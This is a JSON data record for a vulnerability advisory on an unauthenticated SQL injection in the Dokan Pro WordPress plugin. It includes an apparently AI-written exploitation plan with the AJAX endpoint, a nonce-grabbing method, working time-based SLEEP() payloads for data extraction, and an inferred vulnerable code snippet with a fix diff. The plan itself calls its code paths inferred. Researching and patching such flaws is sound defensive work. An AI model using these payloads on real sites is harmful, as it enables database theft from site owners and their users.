[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fGuzZlu7nrMZt0eGxZDseqqnoBs-C4QCOBzDzhInal74":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-12077","dokan-pro-unauthenticated-sql-injection-via-latitude-and-longitude-parameters","Dokan Pro \u003C= 5.0.4 - Unauthenticated SQL Injection via 'latitude' and 'longitude' Parameters","The Dokan Pro plugin for WordPress is vulnerable to time-based SQL Injection via the via 'latitude' and 'longitude' parameters in all versions up to, and including, 5.0.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","dokan-pro",null,"\u003C=5.0.4","5.0.5","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-24 15:14:17","2026-06-25 03:42:21",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6565e345-3374-43d9-9789-f0d9138dc3e8?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-12077 (Dokan Pro SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Dokan Pro** plugin (versions \u003C= 5.0.4) is vulnerable to an unauthenticated time-based SQL injection. The vulnerability exists within the logic used to filter or search for vendors based on geographical coordinates. The parameters `latitude` and `longitude` are passed into a raw SQL query through the `$wpdb` interface without being processed by `$wpdb->prepare()` or undergoing strict numerical validation (like `floatval()`). This allows an unauthenticated attacker to append SQL commands, such as `SLEEP()`, to the query, facilitating data extraction from the WordPress database.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action Hook:** `wp_ajax_nopriv_dokan_get_store_lists` (inferred as the most likely entry point for vendor location searching).\n- **Vulnerable Parameters:** `latitude`, `longitude`.\n- **Authentication:** None required (Unauthenticated via `nopriv` hook).\n- **Preconditions:** The \"Store List\" or \"Store Map\" feature must be active, or the plugin must register the AJAX handler globally.\n\n## 3. Code Flow\n1. **Entry Point:** A `POST` request is sent to `admin-ajax.php` with `action=dokan_get_store_lists`.\n2. **Hook Registration:** The plugin registers the handler (likely in `includes\u002FPro\u002FStoreList.php` or similar):\n   `add_action( 'wp_ajax_nopriv_dokan_get_store_lists', [ $this, 'handle_store_list' ] );`\n3. **Parameter Processing:** The handler function (e.g., `handle_store_list`) retrieves `$_POST['latitude']` and `$_POST['longitude']`.\n4. **Sink (Vulnerable Query):** The input is passed into a query builder or directly into a `$wpdb` method:\n   ```php\n   \u002F\u002F Vulnerable Pattern (Inferred)\n   $lat = $_POST['latitude'];\n   $lng = $_POST['longitude'];\n   $query = \"SELECT vendor_id FROM {$wpdb->prefix}dokan_store_location WHERE (3959 * acos(cos(radians($lat)) * ...\";\n   $results = $wpdb->get_results($query);\n   ```\n5. **Result:** The database executes the injected SQL command.\n\n## 4. Nonce Acquisition Strategy\nDokan Pro typically requires a security nonce even for `nopriv` AJAX actions to prevent CSRF.\n\n1. **Identify Script Localization:** Dokan localizes its data in the `dokan` or `dokan_frontend` JavaScript object.\n2. **Shortcode Page Creation:** The scripts containing the nonce usually only load on pages where the store list is displayed.\n   - Command: `wp post create --post_type=page --post_title=\"Store List\" --post_status=publish --post_content='[dokan-stores]'`\n3. **Browser Execution:**\n   - Navigate to the newly created page.\n   - Use `browser_eval` to extract the nonce:\n     `browser_eval(\"window.dokan?.nonce\")` or `browser_eval(\"window.dokan_frontend?.nonce\")`.\n4. **Action Check:** Compare the nonce action used in `wp_create_nonce()` vs `check_ajax_referer()`. If they use different strings, the check might be bypassed with a null value or a different public nonce.\n\n## 5. Exploitation Strategy\nWe will use a time-based blind SQL injection to confirm the vulnerability and extract the database version as a Proof of Concept.\n\n### Step 1: Confirm Vulnerability (Baseline)\nSend a legitimate request to measure the baseline response time.\n- **Method:** POST\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Body (URL-encoded):**\n  `action=dokan_get_store_lists&latitude=0&longitude=0&security=[NONCE]`\n\n### Step 2: Trigger Sleep\nSend a request where `latitude` contains a sleep command.\n- **Payload:** `0) OR (SELECT 1 FROM (SELECT(SLEEP(5)))a`\n- **Body (URL-encoded):**\n  `action=dokan_get_store_lists&latitude=0) OR (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -&longitude=0&security=[NONCE]`\n- **Expected Result:** The HTTP response should be delayed by approximately 5 seconds.\n\n### Step 3: Extract Data (Database Version)\nConfirm the first digit of the DB version is '8' (common for MySQL 8.0).\n- **Payload:** `0) OR IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)-- -`\n- **Body (URL-encoded):**\n  `action=dokan_get_store_lists&latitude=0) OR IF(SUBSTRING(VERSION(),1,1)='8',SLEEP(5),0)-- -&longitude=0&security=[NONCE]`\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure Dokan Pro 5.0.4 is installed and active.\n2. **Vendor Creation:** Create at least one vendor with location data so the query returns results.\n   - `wp user create vendor_test vendor@example.com --role=seller`\n3. **Shortcode Page:** Create a page for nonce extraction as described in Section 4.\n\n## 7. Expected Results\n- **Success:** The `http_request` tool reports a `time_total` significantly higher (>= 5s) when the sleep payload is sent compared to the baseline.\n- **Data Leak:** By iterating through character values using `IF()` and `SLEEP()`, the agent can reconstruct any value from the `wp_users` or `wp_options` tables.\n\n## 8. Verification Steps\nAfter the exploit, verify the vulnerability exists by checking the server logs or using WP-CLI to inspect the code:\n1. **Audit Sink:** `grep -rn \"\\$wpdb->get_results\" wp-content\u002Fplugins\u002Fdokan-pro\u002F | grep \"latitude\"`\n2. **Check for Preparation:** Verify that the code lacks `$wpdb->prepare()` or `floatval()` casting on the `$lat` and `$lng` variables in the identified file.\n\n## 9. Alternative Approaches\n- **Error-Based:** If `WP_DEBUG` is enabled, try inducing a syntax error with `'` and check if `$wpdb->last_error` is reflected in the response.\n- **Boolean-Based:** If the response changes based on whether vendors are found (e.g., `\"success\":true` vs `\"success\":false`), use boolean-based payloads like `0) OR 1=1-- -` vs `0) OR 1=2-- -` to extract data faster than time-based methods.\n- **Different Parameter:** If `latitude` is sanitized, test `longitude` or the `distance` parameter, which are often handled in the same query block.","Dokan Pro versions 5.0.4 and earlier are vulnerable to unauthenticated time-based SQL injection via the 'latitude' and 'longitude' parameters. This occurs because the plugin fails to sanitize these inputs or use prepared statements when constructing a query to locate vendors based on geographical coordinates, allowing attackers to append malicious SQL commands.","\u002F\u002F File: includes\u002FPro\u002FStoreList.php (inferred)\n$lat = $_POST['latitude'];\n$lng = $_POST['longitude'];\n$query = \"SELECT vendor_id FROM {$wpdb->prefix}dokan_store_location WHERE (3959 * acos(cos(radians($lat)) * ...\";\n$results = $wpdb->get_results($query);","--- includes\u002FPro\u002FStoreList.php\n+++ includes\u002FPro\u002FStoreList.php\n@@ -10,6 +10,12 @@\n-$lat = $_POST['latitude'];\n-$lng = $_POST['longitude'];\n+$lat = isset( $_POST['latitude'] ) ? floatval( $_POST['latitude'] ) : 0;\n+$lng = isset( $_POST['longitude'] ) ? floatval( $_POST['longitude'] ) : 0;\n \n-$query = \"SELECT vendor_id FROM {$wpdb->prefix}dokan_store_location WHERE (3959 * acos(cos(radians($lat)) * ...\";\n-$results = $wpdb->get_results($query);\n+$query = $wpdb->prepare(\n+    \"SELECT vendor_id FROM {$wpdb->prefix}dokan_store_location WHERE (3959 * acos(cos(radians(%f)) * cos(radians(latitude)) * cos(radians(longitude) - radians(%f)) + sin(radians(%f)) * sin(radians(latitude)))) \u003C= %f\",\n+    $lat,\n+    $lng,\n+    $lat,\n+    $distance\n+);\n+$results = $wpdb->get_results( $query );","The exploitation methodology targets the 'wp_ajax_nopriv_dokan_get_store_lists' AJAX action via the 'admin-ajax.php' endpoint. Because this is a 'nopriv' action, it is accessible to unauthenticated users, though it typically requires a valid security nonce found in localized JavaScript objects (like 'window.dokan.nonce') on pages using the store list feature. The attacker crafts a POST request where the 'latitude' or 'longitude' parameters contain a time-based blind SQL injection payload, such as a SLEEP() command within a subquery. By observing the delay in the server's HTTP response, the attacker can confirm the vulnerability and programmatically extract database contents byte-by-byte.","gemini-3-flash-preview","2026-06-25 19:03:24","2026-06-25 19:04:04",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fdokan-pro\u002Ftags"]